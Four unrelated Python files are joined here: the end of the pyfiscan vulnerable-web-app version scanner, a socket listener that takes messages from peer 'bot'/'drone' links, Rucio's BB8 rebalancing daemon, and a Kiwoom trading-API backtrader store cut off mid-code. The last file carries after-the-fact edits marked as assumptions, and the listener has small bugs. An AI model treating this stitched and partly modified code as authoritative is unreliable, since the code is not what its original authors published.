fixed += 1
except KeyError:
print traceback.format_exc()
pass
except TypeError:
print traceback.format_exc()
pass
if total == 0:
sys.exit('No lines in CSV file. Exiting..')
pers = fixed / total * 100
print '{0} of {1} have upgraded, which is {2:.2f}%.'.format(fixed, total, pers)
report.close()
def Worker(home_location, post_process):
"""This is the actual worker which calls smaller functions in case of
correct directory/file match is found.
- Takes and removes item from queue
- Detection in case of correct directory/file match is found
- Compares found version against secure version in YAML
- Calls logging
Every worker runs in a loop.
"""
# Opens file handle to CSV
try:
report = IssueReport()
except Exception:
report.close()
logging.error(traceback.format_exc())
return
while 1:
try:
item = queue.get()
if not item:
break
item_location, location, appname = item
logging.info('Processing: %s (%s)', appname, item_location)
for issue in database.issues[appname].itervalues():
logging.debug('Processing item %s with location %s with with appname %s issue %s', \
item_location, location, appname, issue)
# Loads fingerprint function from YAML file and checks for
# version from detected location
fn = yaml_fn_dict[issue['fingerprint']]
file_version = fn(item_location, issue['regexp'])
# Makes sure we don't go forward without version number from the file
if file_version:
# Tests that version from file is smaller than secure version
# with fingerprint function
logging.debug('Comparing versions %s:%s for item %s', \
issue['secure_version'], file_version, item_location)
if is_not_secure(issue['secure_version'], file_version, appname):
# Executes post processing. Does not do anything in case
# post_processing is not defined in yaml fingerprint.
# Do not do php5.fcgi check for public_html
if not home_location:
home_location = '/home'
if item_location[len(os.path.abspath(home_location)):].split('/')[:5][2] == 'public_html':
public_html_used = True
else:
public_html_used = False
if post_process and not public_html_used:
try:
if issue['post_processing'][0] == 'php5.fcgi':
if not postprocess_php5fcgi(home_location, item_location):
break
except KeyError:
pass
# item_location is stripped from application location so that
# we get cleaner output and actual installation directory
install_dir = item_location[:item_location.find(location)]
# Calls result handler (goes to CSV and log)
handle_results(report, appname, file_version, install_dir, \
issue['cve'], issue['secure_version'])
else:
logging.debug('No version found from item: %s with regexp %s', \
item_location, issue['regexp'])
except Exception:
logging.error(traceback.format_exc())
report.close()
if __name__ == "__main__":
logfile = 'pyfiscan.log'
usage = """
Usage:
pyfiscan.py [--check-modes] [-p] [-l LEVEL] [-a NAME]
pyfiscan.py -r <directory> [-l LEVEL] [-a NAME]
pyfiscan.py --home <directory> [--check-modes] [-p] [-l LEVEL] [-a NAME]
pyfiscan.py --check <FILE>
pyfiscan.py --file <FILE> [-l LEVEL] [-a NAME]
pyfiscan.py [-h|--help]
pyfiscan.py --version
Options:
-r DIR Scans directories recursively.
-p Enable post process for php5.fcgi file checks.
--home DIR Specifies where the home-directories are located.
--check FILE Rechecks entries in old CSV files.
--file FILE Scan using list of filename/paths in FILE (e.g. locate output)
--check-modes Check using execution bit if we are allowed to traverse directories.
-l LEVEL Specifies logging level: info, debug.
-a NAME Scans only specific applications. Delimiter: ,
If you do not specify the recursive option, the following predefined directories are scanned:
/home/user/sites/vhost/www
/home/user/sites/vhost/secure-www
/home/user/public_html
"""
arguments = docopt(usage, version='pyfiscan 0.9')
starttime = time.time() # used to measure program runtime
# If enabled only checks status using old result file
# Check argument must be handled first so that we don't open handle to
# logfile. Maybe we add some kind of logging to checker in the future
if arguments['--check']:
check_old_results(arguments['--check'])
sys.exit(1)
# Available logging levels, which are also hardcoded to usage
levels = {'info': logging.INFO, 'debug': logging.DEBUG}
if arguments['-l']:
level_name = arguments['-l']
else:
level_name = str('info')
if not level_name in levels:
print('No such log level. Available levels are: %s' % levels.keys())
sys.exit(1)
level = levels.get(level_name, logging.NOTSET)
# Post process is used for checking if file exists in installation
# directory. For example config files and PHP fcgi-file.
post_process = None
if arguments['-p']:
post_process = True
# Includes is used to scan only specific applications.
includes = None
if arguments['-a']:
includes = arguments['-a']
includes = includes.split(',')
# Exit in case logfile is symlink
if os.path.islink(logfile):
sys.exit('Logfile %s is a symlink. Exiting..' % logfile)
try:
logging.basicConfig(filename=logfile, level=level, format='%(asctime)s %(levelname)s %(funcName)s:%(lineno)d %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
os.chmod(logfile, 0600)
except IOError as (errno, strerror):
if errno == int('13'):
sys.exit('Error while writing to logfile: %s' % strerror)
try:
database = Database('yamls/', includes)
if len(database.issues) == 0:
sys.exit('Empty database. Exiting..')
# stderr to /dev/null
devnull_fd = open(os.devnull, "w")
sys.stderr = devnull_fd
log_to_stderr()
# Starts the asynchronous workers. Amount of workers is the same as cores in server.
# http://docs.python.org/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool
logging.debug('Starting workers.')
pool = Pool()
pool.apply_async(Worker, [arguments['--home'], post_process])
# Starts the actual populator daemon to get possible locations, which will be verified by workers.
# http://docs.python.org/library/multiprocessing.html#multiprocessing.Process
p = PopulateScanQueue()
if arguments['-r']:
logging.debug('Scanning recursively from path: %s', arguments['-r'])
populator = Process(target=p.populate, args=([arguments['-r']],))
elif arguments['--home']:
logging.debug('Scanning predefined variables: %s', arguments['--home'])
populator = Process(target=p.populate_predefined, args=(arguments['--home'], arguments['--check-modes'],))
elif arguments['--file']:
logging.debug('Scanning using file: %s', arguments['--file'])
populator = Process(target=p.populate_filelist, args=([arguments['--file']],))
else:
logging.debug('Scanning predefined variables: /home')
populator = Process(target=p.populate_predefined, args=('/home', arguments['--check-modes'],))
populator.start()
# Prevents any more tasks from being submitted to the pool. Once all the tasks have been completed the worker processes exit using kill-signal None
# http://docs.python.org/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool.close
populator.join()
pool.close()
pool.join()
runtime = time.time() - starttime
logging.info('Scanning ended, which took %s seconds', runtime)
except KeyboardInterrupt:
logging.info('Received keyboard interrupt. Exiting..')
pool.join()
populator.join()
print('Received keyboard interrupt. Exiting..')
runtime = time.time() - starttime
logging.info('Scanning ended, which took %s seconds', runtime)
print('Scanning ended, which took %s seconds', runtime)
except Exception:
logging.error(traceback.format_exc())
|
incoming_link.py
|
import threading
import logging
import os
import sys
from ..scanner_cogs import *
from ..scanner_cogs import get_ip
from .head_recv import *
local_net = []
lhost = get_ip.get_ip()
def p2p_welcomer(server):
"""[summary]
Accepts incoming connections and hands each one off to an incoming link
thread. Ideally the listen backlog would be the number of current incoming
link threads plus 2.
Args:
server ([sock]): [The listening server socket.]
"""
while True:
#NOTE: This listen() call is only supposed to be here until I figure out how to set the backlog to the number of current incoming link threads (+2)
server.listen(2)
incoming_link_path = "permanence_files\ip_messages\incoming_messages/"
if os.path.isfile(incoming_link_path):
dir_list = os.listdir(incoming_link_path)
print(f"THIS IS HOW MANY FILES ARE IN INCOMING_MESSAGES: {len(dir_list)}")
else:
dir_list = 0
logging.info(f"No files found in {incoming_link_path}", exc_info=True)
print(f"HOW MANY MESSAGES IN INCOMING: {dir_list}")
conn, addr = server.accept()
print(f"BOT_CONNECTED:{conn}, {addr}")
if conn:
if addr:
link_drone_thread = threading.Thread(target=link, args=(conn, addr))
link_drone_thread.name = "INCOMING_LINK"
link_drone_thread.start()
else:
logging.info(f"Failed to retrieve {conn} address.", exc_info=True)
try:
conn.shutdown(2)
except:
logging.error(f"Failed to shutdown connection {conn}", exc_info=True)
conn.close()
else:
try:
conn.shutdown(2)
except Exception as e:
logging.error(f"Failed to shutdown unknown connection", exc_info=True)
conn.close()
def shutdown_incoming_link(conn, file, err, addr):
"""[summary]
This function is a universal shutdown for an incoming link. It reports why the incoming link shut down in a summary message.
Args:
conn ([sock]): [A socket connection]
file ([TextIOWrapper]): [A file]
err ([Exception]): [The exception that caused the error. (If applicable)]
addr ([str]): [An IPv4 address, without the port number.]
"""
ip_message_file_name = addr + ".ipmessage"
ip_message_file_location = "./permanence_files/ip_messages/incoming_messages/"
ip_message_file_path = os.path.join(ip_message_file_location, ip_message_file_name)
if os.path.exists(ip_message_file_path):
try:
os.remove(ip_message_file_path)
except Exception as e:
logging.error(f"Failed to remove {ip_message_file_path} in shutdown_sequence for link {addr}", exc_info=True)
else:
logging.info(f"Failed to remove {ip_message_file_path} in shutdown_sequence for link {addr} because it does not exist.")
if conn:
try:
conn.shutdown(2)
except Exception as e:
logging.error(f"Could not shutdown incoming_link {addr}", exc_info=True)
conn.close()
if file == False:
print(f"(SHUTDOWN SEQUENCE MESSAGE) FILE TEXTIOWRAPPER NOT FOUND, NON-FATAL SHUTDOWN ERROR.")
else:
try:
file.close()
except Exception as e:
logging.critical(f"Could not close file {file} even though it exists.", exc_info=True)
if err:
if err != False:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) THE EXCEPTION {err} OCCURRED AT {addr}. CONNECTION FATAL.")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) THE EXCEPTION {err} OCCURRED AT {conn}. CONNECTION FATAL. EXAMINE CONNECTION FOR ADDRESS, ADDRESS NOT AVAILABLE.")
elif err == False:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) SHUTTING DOWN INCOMING LINK CONNECTION WITH {addr} FOR UNPROVIDED REASON.")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) SHUTTING DOWN AN INCOMING LINK FOR AN UNPROVIDED REASON. ADDRESS NOT AVAILABLE, EXAMINE CONNECTION: {conn}")
else:
if addr:
print(f"(SHUTDOWN SEQUENCE MESSAGE) EXAMINE CODE IN INCOMING LINK, GOT RESPONSE {err} from {addr}")
else:
print(f"(SHUTDOWN SEQUENCE MESSAGE) EXAMINE CODE IN INCOMING LINK, GOT RESPONSE {err} FROM UNKNOWN INCOMING LINK, EXAMINE CONNECTION: {conn}")
sys.exit()
def link(conn, addr):
"""[summary]
The incoming_link is the receiving end of an outgoing link from another bot.
Args:
conn ([socket]): [A socket connection (in the role of a server)]
addr ([str]): [An IPv4 address, without the port number.]
"""
file = False
addr = str(addr)
ip_message_file_name = addr + ".ipmessage"
ip_message_file_location = "./permanence_files/ip_messages/incoming_messages/"
ip_message_file_path = os.path.join(ip_message_file_location, ip_message_file_name)
if os.path.isfile(ip_message_file_path):
try:
os.remove(ip_message_file_path)
except Exception as e:
logging.critical(f"Could not remove a previous version of .ipmessage file from incoming_link {addr}, even though the previous file exists. Shutting down incoming_link.", exc_info=True)
shutdown_incoming_link(conn, False, e, addr)
if not os.path.isdir(ip_message_file_location):
try:
os.makedirs(ip_message_file_location, exist_ok=True)
except Exception as e:
logging.critical(f"Could not create {ip_message_file_location} for incoming_link {addr}, even though the file does not exist. Shutting down incoming_link", exc_info=True)
shutdown_incoming_link(conn, False, e, addr)
print("STARTED INCOMING LINK")
disconnection_counter = 0
waiting_for_info = True
conn.settimeout(5)
while waiting_for_info == True:
net_link = head_recv(conn, addr)
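# As handled below, head_recv is treated as returning one of:
#   - the string "DRONE_IDLE" (keep-alive, no payload),
#   - a two-element list [detail, "LOCAL_ERROR" | "SECURITY_ALERT"],
#   - any other truthy value, written to the .ipmessage file as a message,
#   - or a falsy value, which increments the disconnection counter.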
if net_link:
if net_link == "DRONE_IDLE":
conn.settimeout(None)
else:
conn.settimeout(5)
if type(net_link) == type([]):
if net_link[1] == "LOCAL_ERROR":
if net_link[0] == "FATAL_CONNECTION_ERROR":
logging.critical(f"Encountered fatal connection error in incoming_link {addr} , for more details, check the appropriate head_recv log file.", exc_info=True)
shutdown_incoming_link(conn, file, "", addr)
else:
print(f"LOCAL_ERROR: {net_link[0]} experienced. Non-fatal.")
if net_link[1] == "SECURITY_ALERT":
print(f"SECURITY_ALERT: {net_link[0]} experienced. Non-fatal.")
try:
file = open(ip_message_file_path, "r")
except Exception as e:
logging.info(f"Could not open or read {ip_message_file_path} in incoming_link {addr}", exc_info=True)
try:
file = open(ip_message_file_path, "x")
except Exception as e:
logging.critical(f"Could not create the file {ip_message_file_path} in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
finally:
try:
file = open(ip_message_file_path, "a+")
except Exception as e:
logging.critical(f"Could not open {ip_message_file_path} in append+ mode in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
if net_link == "DRONE_IDLE":
pass
else:
if type(net_link) != type([]):
net_link = str(net_link)
try:
file.write(net_link)
except:
try:
file = open(ip_message_file_path, "a+")
file.write(net_link)
except Exception as e:
logging.critical(f"Could not open {ip_message_file_path} in append+ mode, or could not write to {ip_message_file_path} in append+ mode in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
file.write("\n")
file.close()
elif not net_link:
disconnection_counter += 1
if disconnection_counter == 5:
try:
conn.sendall(bytes("conn_test", "utf-8"))
disconnection_counter = 0
except Exception as err:
print("INCOMING_LINK_DISCONNECTED")
try:
conn.shutdown(2)
except Exception as e:
logging.critical(f"Could not shutdown connection {conn} in incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, e, addr)
finally:
logging.critical(f"Outgoing link {conn} disconnected from incoming_link {addr}", exc_info=True)
shutdown_incoming_link(conn, file, err, addr)
|
bb8.py
|
# -*- coding: utf-8 -*-
# Copyright CERN since 2016
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
BB8 is a daemon that rebalances data between RSEs.
"""
import logging
import socket
import threading
import time
import os
from sqlalchemy import func, or_, and_
from rucio.db.sqla.session import read_session
from rucio.db.sqla import models
from rucio.db.sqla.constants import RuleState, LockState
from rucio.common.exception import InvalidRSEExpression
from rucio.common.logging import formatted_logger, setup_logging
from rucio.core import config as config_core
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.heartbeat import live, die, sanity_check, list_payload_counts
from rucio.core.rse import get_rse_usage
from rucio.daemons.bb8.common import rebalance_rse
GRACEFUL_STOP = threading.Event()
def rule_rebalancer(rse_expression, move_subscriptions=False, use_dump=False, sleep_time=300, once=True, dry_run=False):
"""
Main loop to rebalance rules automatically
"""
total_rebalance_volume = 0
executable = 'rucio-bb8'
hostname = socket.gethostname()
pid = os.getpid()
hb_thread = threading.current_thread()
heart_beat = live(executable, hostname, pid, hb_thread)
prepend_str = 'bb8[%i/%i] ' % (heart_beat['assign_thread'], heart_beat['nr_threads'])
logger = formatted_logger(logging.log, prepend_str + '%s')
logger(logging.DEBUG, 'rse_expression: %s', rse_expression)
logger(logging.INFO, 'BB8 started')
while not GRACEFUL_STOP.is_set():
logger(logging.INFO, 'Starting new cycle')
heart_beat = live(executable, hostname, pid, hb_thread)
start_time = time.time()
total_rebalance_volume = 0
tolerance = config_core.get('bb8', 'tolerance', default=0.05)
max_total_rebalance_volume = config_core.get('bb8', 'max_total_rebalance_volume', default=10 * 1E12)
max_rse_rebalance_volume = config_core.get('bb8', 'max_rse_rebalance_volume', default=500 * 1E9)
min_total = config_core.get('bb8', 'min_total', default=20 * 1E9)
payload_cnt = list_payload_counts(executable, older_than=600, hash_executable=None, session=None)
if rse_expression in payload_cnt:
logger(logging.WARNING, 'One BB8 instance already running with the same RSE expression. Stopping')
break
else:
# List the RSEs represented by rse_expression
try:
rses = [rse for rse in parse_expression(rse_expression)]
list_rses2 = [rse['rse'] for rse in rses]
except InvalidRSEExpression as err:
logger(logging.ERROR, err)
break
# List the RSEs represented by all the RSE expressions stored in heartbeat payload
list_rses1 = []
for rse_exp in payload_cnt:
if rse_exp:
list_rses1 = [rse['rse'] for rse in parse_expression(rse_exp)]
for rse in list_rses2:
if rse in list_rses1:
logger(logging.WARNING, 'Overlapping RSE expressions %s vs %s. Stopping', rse_exp, rse_expression)
break
logger(logging.INFO, 'Will process rebalancing on %s', rse_expression)
heart_beat = live(executable, hostname, pid, hb_thread, older_than=max(600, sleep_time), hash_executable=None, payload=rse_expression, session=None)
total_primary = 0
total_secondary = 0
total_total = 0
global_ratio = float(0)
for rse in rses:
logger(logging.DEBUG, 'Getting RSE usage on %s', rse['rse'])
rse_usage = get_rse_usage(rse_id=rse['id'])
usage_dict = {}
for item in rse_usage:
# TODO Check last update
usage_dict[item['source']] = {'used': item['used'], 'free': item['free'], 'total': item['total']}
try:
rse['primary'] = usage_dict['rucio']['used'] - usage_dict['expired']['used']
rse['secondary'] = usage_dict['expired']['used']
rse['total'] = usage_dict['storage']['total'] - usage_dict['min_free_space']['used']
rse['ratio'] = float(rse['primary']) / float(rse['total'])
except KeyError as err:
logger(logging.ERROR, 'Missing source usage %s for RSE %s. Exiting', err, rse['rse'])
break
total_primary += rse['primary']
total_secondary += rse['secondary']
total_total += float(rse['total'])
rse['receive_volume'] = 0 # Already rebalanced volume in this run
global_ratio = float(total_primary) / float(total_total)
logger(logging.INFO, 'Global ratio: %f' % (global_ratio))
for rse in sorted(rses, key=lambda k: k['ratio']):
logger(logging.INFO, '%s Sec/Prim local ratio (%f) vs global %s', rse['rse'], rse['ratio'], global_ratio)
rses_over_ratio = sorted([rse for rse in rses if rse['ratio'] > global_ratio + global_ratio * tolerance], key=lambda k: k['ratio'], reverse=True)
rses_under_ratio = sorted([rse for rse in rses if rse['ratio'] < global_ratio - global_ratio * tolerance], key=lambda k: k['ratio'], reverse=False)
# Excluding RSEs
logger(logging.DEBUG, 'Excluding RSEs as destination which are too small by size:')
for des in rses_under_ratio:
if des['total'] < min_total:
logger(logging.DEBUG, 'Excluding %s', des['rse'])
rses_under_ratio.remove(des)
logger(logging.DEBUG, 'Excluding RSEs as sources which are too small by size:')
for src in rses_over_ratio:
if src['total'] < min_total:
logger(logging.DEBUG, 'Excluding %s', src['rse'])
rses_over_ratio.remove(src)
logger(logging.DEBUG, 'Excluding RSEs as destinations which are not available for write:')
for des in rses_under_ratio:
if des['availability'] & 2 == 0:
logger(logging.DEBUG, 'Excluding %s', des['rse'])
rses_under_ratio.remove(des)
logger(logging.DEBUG, 'Excluding RSEs as sources which are not available for read:')
for src in rses_over_ratio:
if src['availability'] & 4 == 0:
logger(logging.DEBUG, 'Excluding %s', src['rse'])
rses_over_ratio.remove(src)
# Gets the number of active transfers per location
dict_locks = get_active_locks(session=None)
# Loop over RSEs over the ratio
for index, source_rse in enumerate(rses_over_ratio):
# The volume that would be rebalanced, not real availability of the data:
available_source_rebalance_volume = int((source_rse['primary'] - global_ratio * source_rse['secondary']) / (global_ratio + 1))
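# Worked example with hypothetical numbers: primary = 800 TB, secondary = 200 TB
# and global_ratio = 0.6 give (800 - 0.6 * 200) / (0.6 + 1) = 425 TB, which the
# checks below then cap by max_rse_rebalance_volume and by the remaining
# max_total_rebalance_volume.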
if available_source_rebalance_volume > max_rse_rebalance_volume:
available_source_rebalance_volume = max_rse_rebalance_volume
if available_source_rebalance_volume > max_total_rebalance_volume - total_rebalance_volume:
available_source_rebalance_volume = max_total_rebalance_volume - total_rebalance_volume
# Select a target:
for destination_rse in rses_under_ratio:
if available_source_rebalance_volume > 0:
vo_str = ' on VO {}'.format(destination_rse['vo']) if destination_rse['vo'] != 'def' else ''
if index == 0 and destination_rse['id'] in dict_locks:
replicating_volume = dict_locks[destination_rse['id']]['bytes']
logger(logging.DEBUG, 'Already %f TB replicating to %s%s', replicating_volume / 1E12, destination_rse['rse'], vo_str)
destination_rse['receive_volume'] += replicating_volume
if destination_rse['receive_volume'] >= max_rse_rebalance_volume:
continue
available_target_rebalance_volume = max_rse_rebalance_volume - destination_rse['receive_volume']
if available_target_rebalance_volume >= available_source_rebalance_volume:
available_target_rebalance_volume = available_source_rebalance_volume
logger(logging.INFO, 'Rebalance %d TB from %s(%f) to %s(%f)%s', available_target_rebalance_volume / 1E12, source_rse['rse'], source_rse['ratio'], destination_rse['rse'], destination_rse['ratio'], vo_str)
expr = destination_rse['rse']
rebalance_rse(rse_id=source_rse['id'], max_bytes=available_target_rebalance_volume, dry_run=dry_run, comment='Background rebalancing', force_expression=expr, logger=logger)
destination_rse['receive_volume'] += available_target_rebalance_volume
total_rebalance_volume += available_target_rebalance_volume
available_source_rebalance_volume -= available_target_rebalance_volume
if once:
break
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %f seconds', sleep_time - time_diff)
GRACEFUL_STOP.wait(sleep_time - time_diff)
die(executable='rucio-bb8', hostname=hostname, pid=pid, thread=hb_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(once, rse_expression, move_subscriptions=False, use_dump=False, sleep_time=300, threads=1, dry_run=False):
"""
Starts up the BB8 rebalancing threads.
"""
setup_logging()
hostname = socket.gethostname()
sanity_check(executable='rucio-bb8', hostname=hostname)
if once:
rule_rebalancer(rse_expression=rse_expression, move_subscriptions=move_subscriptions, use_dump=use_dump, once=once)
else:
logging.info('BB8 starting %s threads', str(threads))
threads = [threading.Thread(target=rule_rebalancer, kwargs={'once': once, 'rse_expression': rse_expression, 'sleep_time': sleep_time, 'dry_run': dry_run}) for _ in range(0, threads)]
[thread.start() for thread in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[thread.join(timeout=3.14) for thread in threads]
@read_session
def get_active_locks(session=None):
locks_dict = {}
rule_ids = session.query(models.ReplicationRule.id).filter(or_(models.ReplicationRule.state == RuleState.REPLICATING, models.ReplicationRule.state == RuleState.STUCK),
models.ReplicationRule.comments == 'Background rebalancing').all()
for row in rule_ids:
rule_id = row[0]
query = session.query(func.count(), func.sum(models.ReplicaLock.bytes), models.ReplicaLock.state, models.ReplicaLock.rse_id).\
filter(and_(models.ReplicaLock.rule_id == rule_id, models.ReplicaLock.state != LockState.OK)).group_by(models.ReplicaLock.state, models.ReplicaLock.rse_id)
for lock in query.all():
cnt, size, _, rse_id = lock
if rse_id not in locks_dict:
locks_dict[rse_id] = {'bytes': 0, 'locks': 0}
locks_dict[rse_id]['locks'] += cnt
locks_dict[rse_id]['bytes'] += size
return locks_dict
|
KiwoomOpenApiStore.py
|
# pylint: disable=no-member
import time
import datetime
import threading
import collections
import backtrader as bt
import pytz
from backtrader import TimeFrame
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
from koapy.context.KiwoomOpenApiContext import KiwoomOpenApiContext
from koapy.openapi.KiwoomOpenApiError import KiwoomOpenApiError
from koapy.backtrader.KiwoomOpenApiEventStreamer import KiwoomOpenApiEventStreamer
class KiwoomOpenApiJsonError(KiwoomOpenApiError):
def __init__(self, code, message=None):
if isinstance(code, KiwoomOpenApiError):
err = code
code = err.code
message = err.message
super().__init__(code, message)
@property
def error_response(self, description=None):
response = {
'code': self.code,
'message': self.message,
'description': description or '',
}
return response
class KiwoomOpenApiTimeFrameError(KiwoomOpenApiJsonError):
def __init__(self):
super().__init__(code=597, message='Not supported TimeFrame')
class HistoricalPriceRecord(collections.namedtuple('HistoricalPriceRecord', ['time', 'open', 'high', 'low', 'close', 'volume'])):
__slots__ = ()
kst = pytz.timezone('Asia/Seoul')
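    # Note: the `time` field below is expressed in microseconds since the Unix epoch,
    # computed from datetimes parsed out of the TR response and localized to KST first.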
@classmethod
def from_tuple(cls, tup):
if '일자' in tup._fields:
dt = datetime.datetime.strptime(tup.일자, '%Y%m%d')
dt = cls.kst.localize(dt)
time = dt.timestamp() * (10 ** 6) # pylint: disable=redefined-outer-name
elif '체결시간' in tup._fields:
dt = datetime.datetime.strptime(tup.체결시간, '%Y%m%d%H%M%S')
dt = cls.kst.localize(dt)
time = dt.timestamp() * (10 ** 6)
else:
raise KiwoomOpenApiError('Cannot specify time')
open = abs(float(tup.시가)) # pylint: disable=redefined-builtin
high = abs(float(tup.고가))
low = abs(float(tup.저가))
close = abs(float(tup.현재가))
volume = abs(float(tup.거래량))
return cls(time, open, high, low, close, volume)
@classmethod
def records_from_dataframe(cls, df):
return [cls.from_tuple(tup) for tup in df[::-1].itertuples()]
@classmethod
def dict_records_from_dataframe(cls, df):
return [msg._asdict() for msg in cls.records_from_dataframe(df)]
class API:
    # For now, keep the implementation as close to the existing Oanda version as possible so that it works,
    # and once it is confirmed to work, gradually optimize it to fit the underlying API below.
def __init__(self, context):
self._context = context
def __getattr__(self, name):
return getattr(self._context, name)
    def get_instruments(self, account, instruments):  # TODO: the available market may differ depending on the account
instruments = self.GetStockInfoAsDataFrame(instruments)
instruments = [tup._asdict() for tup in instruments.itertuples(index=False)]
response = {'instruments': instruments}
return response
def get_history(self, trcode, inputs, dtbegin=None, dtend=None):
if trcode == 'opt10079':
code = inputs['종목코드']
interval = inputs['틱범위']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetTickStockDataAsDataFrame(code, interval, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10080':
code = inputs['종목코드']
interval = inputs['틱범위']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetMinuteStockDataAsDataFrame(code, interval, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10081':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetDailyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10082':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetWeeklyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10083':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetMonthlyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
elif trcode == 'opt10094':
code = inputs['종목코드']
adjusted_price = inputs.get('수정주가구분') == '1'
df = self.GetYearlyStockDataAsDataFrame(code, dtend, dtbegin, adjusted_price=adjusted_price)
else:
raise KiwoomOpenApiError('Unexpected trcode %s' % trcode)
candles = HistoricalPriceRecord.dict_records_from_dataframe(df)
response = {'candles': candles}
return response
def get_positions(self, account):
_summary, foreach = self.GetAccountEvaluationStatusAsSeriesAndDataFrame(account)
positions = [{
'instrument': tup.종목코드,
'side': 'buy',
'units': float(tup.보유수량),
'avgPrice': float(tup.매입금액) / float(tup.보유수량),
} for tup in foreach.itertuples()]
response = {'positions': positions}
return response
def get_account(self, account):
deposit = self.GetDepositInfo(account)
summary, _foreach = self.GetAccountEvaluationStatusAsSeriesAndDataFrame(account)
response = {
'marginAvail': float(deposit['주문가능금액']),
'balance': float(summary['유가잔고평가액']),
}
return response
def create_order(self, account, **kwargs):
# TODO: Implement
raise NotImplementedError
response = {}
return response
def close_order(self, account, oid):
# TODO: Implement
raise NotImplementedError
response = {}
return response
class MetaSingleton(MetaParams):
def __init__(cls, name, bases, dct):
super().__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = super().__call__(*args, **kwargs)
return cls._singleton
class KiwoomOpenApiStore(with_metaclass(MetaSingleton, object)):
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
params = (
('account', ''),
('account_tmout', 10.0),
    )
    # Epoch reference for converting order expiry datetimes into POSIX seconds in order_create();
    # it is referenced below but not defined in this excerpt, so it is added here (an assumption).
    _DTEPOCH = datetime.datetime(1970, 1, 1)
@classmethod
def getdata(cls, *args, **kwargs):
if cls.DataCls is None:
from koapy.backtrader.KiwoomOpenApiData import KiwoomOpenApiData
cls.DataCls = KiwoomOpenApiData
return cls.DataCls(*args, **kwargs) # pylint: disable=not-callable
@classmethod
def getbroker(cls, *args, **kwargs):
if cls.BrokerCls is None:
from koapy.backtrader.KiwoomOpenApiBroker import KiwoomOpenApiBroker
cls.BrokerCls = KiwoomOpenApiBroker
return cls.BrokerCls(*args, **kwargs) # pylint: disable=not-callable
def __init__(self, context=None):
super().__init__()
self.notifs = collections.deque()
self._env = None
self.broker = None
self.datas = list()
if context is None:
context = KiwoomOpenApiContext()
self._context = context
self._context.EnsureConnected()
self.context = API(self._context)
self._cash = 0.0
self._value = 0.0
self._evt_acct = threading.Event()
self.q_account = None
self.q_ordercreate = None
        self.q_orderclose = None
        # Order bookkeeping used by _t_order_create() and _transaction() below; these attributes
        # are referenced later but not initialized in this excerpt (mirroring the Oanda store this
        # module is adapted from -- an assumption).
        self._orders = collections.OrderedDict()      # order ref -> broker order id
        self._ordersrev = collections.OrderedDict()   # broker order id -> order ref
        self._transpend = collections.defaultdict(collections.deque)  # transactions pending per order id
def start(self, data=None, broker=None):
if data is None and broker is None:
return
if data is not None:
self._env = data._env # pylint: disable=protected-access
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
pass
def put_notification(self, msg, *args, **kwargs):
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
self.notifs.append(None)
return [x for x in iter(self.notifs.popleft, None)]
_GRANULARITIES = {
(TimeFrame.Ticks, 1): ('opt10079', {'종목코드': '', '틱범위': '1', '수정주가구분': '1'}),
(TimeFrame.Ticks, 3): ('opt10079', {'종목코드': '', '틱범위': '3', '수정주가구분': '1'}),
(TimeFrame.Ticks, 5): ('opt10079', {'종목코드': '', '틱범위': '5', '수정주가구분': '1'}),
(TimeFrame.Ticks, 10): ('opt10079', {'종목코드': '', '틱범위': '10', '수정주가구분': '1'}),
(TimeFrame.Ticks, 30): ('opt10079', {'종목코드': '', '틱범위': '30', '수정주가구분': '1'}),
(TimeFrame.Minutes, 1): ('opt10080', {'종목코드': '', '틱범위': '1', '수정주가구분': '1'}),
(TimeFrame.Minutes, 3): ('opt10080', {'종목코드': '', '틱범위': '3', '수정주가구분': '1'}),
(TimeFrame.Minutes, 5): ('opt10080', {'종목코드': '', '틱범위': '5', '수정주가구분': '1'}),
(TimeFrame.Minutes, 10): ('opt10080', {'종목코드': '', '틱범위': '10', '수정주가구분': '1'}),
(TimeFrame.Minutes, 15): ('opt10080', {'종목코드': '', '틱범위': '15', '수정주가구분': '1'}),
